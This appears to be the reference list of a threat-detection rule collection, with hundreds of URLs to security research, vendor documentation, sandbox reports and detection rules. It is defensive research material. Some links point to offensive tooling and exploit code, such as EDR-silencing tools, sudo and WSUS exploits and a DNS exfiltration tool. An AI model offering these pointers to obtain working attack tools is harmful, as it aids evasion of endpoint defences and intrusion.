- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group
- https://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91
- https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178
#### Error While Archiving References
- http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
- https://www.linkedin.com/posts/mauricefielenbach_sharepoint-incidentresponse-windowssecurity-activity-7352653907363303425-bL2f
- https://unicornofhunt.com/2025/05/22/When-Unicorns-Go-Quiet-BITS-Jobs-and-the-Art-of-Stealthy-Transfers/
- https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke
- https://www.trendmicro.com/en_gb/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
- https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/
- https://www.cve.org/CVERecord?id=CVE-2024-1709
- https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
- https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html
- https://unit42.paloaltonetworks.com/cve-2025-59287/
- https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html
- https://docs.aws.amazon.com/kms/latest/developerguide/ct-importkeymaterial.html
- https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/integrations/aws/defense_evasion_ec2_flow_log_deletion
- https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode
- https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html
- https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-database-transact-sql?view=sql-server-ver16
- https://x.com/Wietze/status/1933495426952421843
- https://paper.seebug.org/1495/
- https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit
- https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
- https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/
- https://www.cisa.gov/stopransomware/ransomware-guide
- https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector
- https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html
- https://www.huntress.com/blog/know-thy-enemy-a-novel-november-case-on-persistent-remote-access
- https://github.com/TwoSevenOneT/EDR-Freeze/blob/a7f61030b36fbde89871f393488f7075d2aa89f6/EDR-Freeze.cpp#L53
- https://localtonet.com/documents/supported-tunnels
- https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm
- https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/
- https://www.microsoft.com/en-us/security/blog/2025/03/06/malvertising-campaign-leads-to-info-stealers-hosted-on-github/
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role
- https://tria.ge/241015-l98snsyeje/behavioral2
- https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
- https://securelist.com/sidewinder-apt/114089/
- https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36
- https://github.com/redcanaryco/atomic-red-team/blob/5f866ca4517e837c4ea576e7309d0891e78080a8/atomics/T1040/T1040.md#atomic-test-16---powershell-network-sniffing
- https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)
- https://www.joesandbox.com/analysis/1605063/0/html
- https://syedhasan010.medium.com/forensics-analysis-of-an-lnk-file-da68a98b8415
- https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/
- https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool
- https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin
- https://intel.thedfirreport.com/eventReports/view/57
- https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
- https://github.com/CoreyCBurton/DripLoaderNG
- https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/
- https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/
- https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/
- https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure
- https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer
- https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python
- https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/333889629/config-firewall-policy
- https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
- http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/
- https://github.com/trufflesecurity/trufflehog
- https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/
- https://www.linkedin.com/posts/huntress-labs_when-a-sketchy-incident-hits-your-network-activity-7304940371078238208-Th_l/?utm_source=share&utm_medium=member_desktop&rcm=ACoAAAJTlRcB28IaUtg03HUU-IdliwzoAL1flGc
- https://github.com/TwoSevenOneT/EDR-Freeze
- https://pentestlab.blog/2022/03/21/unconstrained-delegation/
- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
- https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/
- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-deviceguard
- https://github.com/0xBruno/WSUSploit.NET/tree/e239bce9d6b5f46a346e1e4c4d5e0a2a20d5c639
- https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf
- https://cardinalops.com/blog/the-art-of-anomaly-hunting-patterns-detection/
- https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15
- https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry
- https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/
- https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
- https://redfoxsec.com/blog/ipv6-dns-takeover/
- https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771
- https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html
- https://unit42.paloaltonetworks.com/chromeloader-malware/
- https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2
- https://docs.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session
- https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/
- https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- https://github.com/redcanaryco/atomic-red-team/blob/5ede8f21e42ebe37e0a6eff757dba60bcfa85859/atomics/T1547.001/T1547.001.md
- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet
- https://www.cyberciti.biz/faq/linux-remove-user-command/
- https://x.com/cyberfeeddigest/status/1887041526397587859
- https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173
- https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites
- https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing
- https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
- https://www.kernel.org/doc/html/v4.10/_sources/admin-guide/sysrq.txt
- https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html
- https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776
- https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/
- https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3
- http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
- https://github.com/netero1010/EDRSilencer/blob/0e73a7037ec65c52894d8208e6f605a7da0a34a6/EDRSilencer.c
- https://github.com/splunk/security_content/blob/7283ba3723551f46b69dfeb23a63b358afb2cb0e/lookups/browser_app_list.csv?plain=1
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucket.html
- https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC
- https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetCallerIdentity.html
- https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- https://learn.microsoft.com/en-us/sql/t-sql/statements/truncate-table-transact-sql?view=sql-server-ver16
- https://twitter.com/Kostastsale/status/1480716528421011458
- https://www.fortiguard.com/psirt/FG-IR-22-398
- https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files
- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
- https://dfir.ch/posts/linux_capabilities/
- https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html
- https://www.cyberciti.biz/faq/how-force-kill-process-linux/
- https://ss64.com/osx/sw_vers.html
- https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/
- https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions
- https://blu.org/mhonarc/discuss/2001/04/msg00285.php
- https://www.huntress.com/blog/attacking-mssql-servers-pt-ii
- https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/
- https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware
- https://docs.microsoft.com/en-us/sql/tools/bcp-utility
- https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html
- https://lolbas-project.github.io/#/download
- https://man7.org/linux/man-pages/man2/personality.2.html
- https://research.checkpoint.com/2025/stealth-falcon-zero-day/
- https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
- https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/
- https://www.softperfect.com/products/networkscanner/
- https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/
- https://github.com/amidaware/tacticalrmm
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931
- https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/
- https://ngrok.com/blog-post/new-ngrok-domains
- https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
- https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis
- https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation
- https://github.com/mhaskar/FsquirtCPLPoC
- https://learn.microsoft.com/en-us/windows/wsl/install
- https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack
- https://awscli.amazonaws.com/v2/documentation/api/2.14.0/reference/account/enable-region.html
- https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability
- https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
- https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/390485493/config-system-admin
- https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix
- https://naikordian.github.io/blog/posts/brute-force-aws-console/
- https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/
- https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/
- https://securelist.com/apt41-in-africa/116986/
- https://tria.ge/231023-lpw85she57/behavioral2
- https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html
- https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/
- https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/
- https://github.com/0xthirteen/SharpMove/
- https://www.group-ib.com/blog/apt41-world-tour-2021/
- https://www.zscaler.fr/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla
- https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/
- https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting
- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/
- https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
- https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml
- https://github.com/The-Viper-One/Invoke-PowerDPAPI/
- https://suktech24.com/2025/07/17/aws-threat-detection-rule-guardduty-detector-disabled-or-suspended/
- https://github.com/nasbench/Misc-Research/blob/2f651ede832ab34027a7ba005b63bb78f1ade378/Other/React-Next-Child-Processes-Notes.md
- https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/
- https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray
- https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc
- https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/#exfiltration
- https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml
- https://juggernaut-sec.com/capabilities/#cap_setgid
- https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
- https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c
- https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
- https://pwn.guide/free/web/crushftp
- https://learn.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.kerberosrequestorsecuritytoken?view=netframework-4.8.1
- https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/
- https://docs.aws.amazon.com/guardduty/latest/APIReference/API_UpdateDetector.html
- https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/set-inboxrule?view=exchange-ps
- https://www.huntress.com/blog/silencing-the-edr-silencers
- https://vmois.dev/query-signal-desktop-messages-sqlite/
- https://tria.ge/231212-r1bpgaefar/behavioral2
- https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/defense_evasion_guardduty_detector_deletion.toml
- https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10)
- https://redcanary.com/threat-detection-report/techniques/email-hiding-rules/
- https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh
- https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/
- https://docs.aws.amazon.com/kms/latest/developerguide/ct-deleteimportedkeymaterial.html
- https://feeds.alphasoc.net/bad-etlds.txt
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/
- https://ss64.com/nt/set.html
- https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
- https://www.greynoise.io/blog/new-scraper-botnet-concentrated-in-taiwan
- https://github.com/Arno0x/DNSExfiltrator/
- https://x.com/wietze/status/1958302556033065292?s=12
- https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html
- https://outpost24.com/blog/crushftp-auth-bypass-vulnerability/
- https://github.com/okta/workflows-templates/blob/1164f0eb71ce47c9ddc7d850e9ab87b5a2b42333/workflows/suspicious_activity_reported/readme.md
- https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/
- https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952
- https://man7.org/linux/man-pages/man2/sysinfo.2.html
- https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/devcon
- https://twitter.com/th3_protoCOL/status/1536788652889497600
- https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1
- https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/
- https://www.loobins.io/binaries/xattr/
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker
- https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110.001/aws_login_failure/aws_cloudtrail_events.json
- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference
- https://github.com/grayhatkiller/SharpExShell
- https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe
- https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/new-inboxrule?view=exchange-ps
- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
- https://adsecurity.org/?p=3377
- https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/managing-iis-log-file-storage
- https://x.com/byrne_emmy12099/status/1932346420226658668
- https://www.elastic.co/security-labs/maas-appeal-an-infostealer-rises-from-the-ashes
- https://moonlock.com/amos-backdoor-persistent-access
- https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea
- https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/
- https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html
- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/
- https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
- https://blog.axelarator.net/hunting-for-edr-freeze/
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9
- https://communities.vmware.com/t5/VMware-Workstation-Pro/VMCI-driver-issues/td-p/2866060
- https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/
- https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/4/html/reference_guide/s3-proc-sys-kernel
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md#atomic-test-3---create-hidden-user-in-registry
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/109120963/config-user-local
- https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
- https://www.coreycburton.com/blog/driploader-case-study
- https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting
- https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/
- https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html
- https://ss64.com/nt/schtasks.html
- https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1082/T1082.md
- https://cloud.google.com/logging/docs/audit/understanding-audit-logs
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd
- https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure
- https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/
- https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/sysinfo-syscall/README.md
- https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php
- https://www.virustotal.com/gui/file/14e722855605ba78dc1d21153f0e1be90e7528149f2cd2d7d6eba8ef27534bdc/behavior
- https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
- https://github.com/TwoSevenOneT/WSASS
- https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/
- https://github.com/JohnHammond/recaptcha-phish
- https://labs.nettitude.com/blog/introducing-sharpwsus/
- http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
- https://redcanary.com/blog/threat-intelligence/msix-installers/
- https://gtfobins.github.io/gtfobins/gawk/#shell
- https://research.splunk.com/endpoint/76406a0f-f5e0-4167-8e1f-337fdc0f1b0c/
- https://man7.org/linux/man-pages/man2/syslog.2.html
- https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/
- https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/
- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
- https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
- https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/
- https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise/
- https://redcanary.com/blog/threat-detection/process-masquerading/
- https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/
- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo
- https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091
- https://github.com/msanft/CVE-2025-55182
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
- https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
- https://github.com/h4rmy/KDU
- https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear
- https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493
- https://securelist.com/notepad-supply-chain-attack/118708/
- https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder
- https://www.bleepingcomputer.com/news/security/centrestack-rce-exploited-as-zero-day-to-breach-file-sharing-servers/
- https://asec.ahnlab.com/en/40263/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673
- https://rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/
- https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement
- https://github.com/rtecCyberSec/BitlockMove
- https://github.com/nasbench/Misc-Research/blob/fc46f6da34ff7e0076da28fd3e66d6e1100f1c2f/ETW/Microsoft-Windows-SMBClient.md
- https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/
- https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/
- https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
- https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/
- https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870
- https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/
- https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
- https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/
- https://docs.stellarcyber.ai/5.2.x/Using/ML/Alert-Rule-Based-Potentially_Malicious_AWS_Activity.html
- https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/getting-started-with-nftables_configuring-and-managing-networking
- https://www.securityhq.com/blog/malicious-isatap-tunneling-unearthed-on-windows-server/
- https://mrd0x.com/filefix-clickfix-alternative/
- https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4
- https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
- https://gtfobins.github.io/gtfobins/capsh/#shell
- https://intel.thedfirreport.com/eventReports/view/70
- http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/
- https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/
- https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/
- https://x.com/Max_Mal_/status/1826179497084739829
- https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/
- https://www.vaadata.com/blog/what-is-command-injection-exploitations-and-security-best-practices/
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054
- https://detect.fyi/hunting-fileless-malware-in-the-windows-registry-1339ccde00ad
- https://www.scip.ch/en/?labs.20240523
- https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/
- https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms
- https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
- https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event
- https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution
- https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/
- https://research.splunk.com/sources/5d8bd475-c8bc-4447-b27f-efa508728b90/
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval
- https://nodejs.org/api/child_process.html#class-childprocess
- https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/
- https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053
- https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws
- https://docs.aws.amazon.com/accounts/latest/reference/API_EnableRegion.html
- https://blackpointcyber.com/blog/racing-to-exploit-centrestacks-cve-2025-30406/
- https://learn.microsoft.com/en-us/sysinternals/downloads/microsoft-store
- https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/
- https://x.com/Threatlabz/status/1879956781360976155
- https://github.com/rapid7/metasploit-framework/issues/11337
- https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
- https://tria.ge/240731-jh4crsycnb/behavioral2
- https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1
- https://github.com/Lifailon/RSA/blob/rsa/Sources/RSA-1.4.1.ps1#L1468
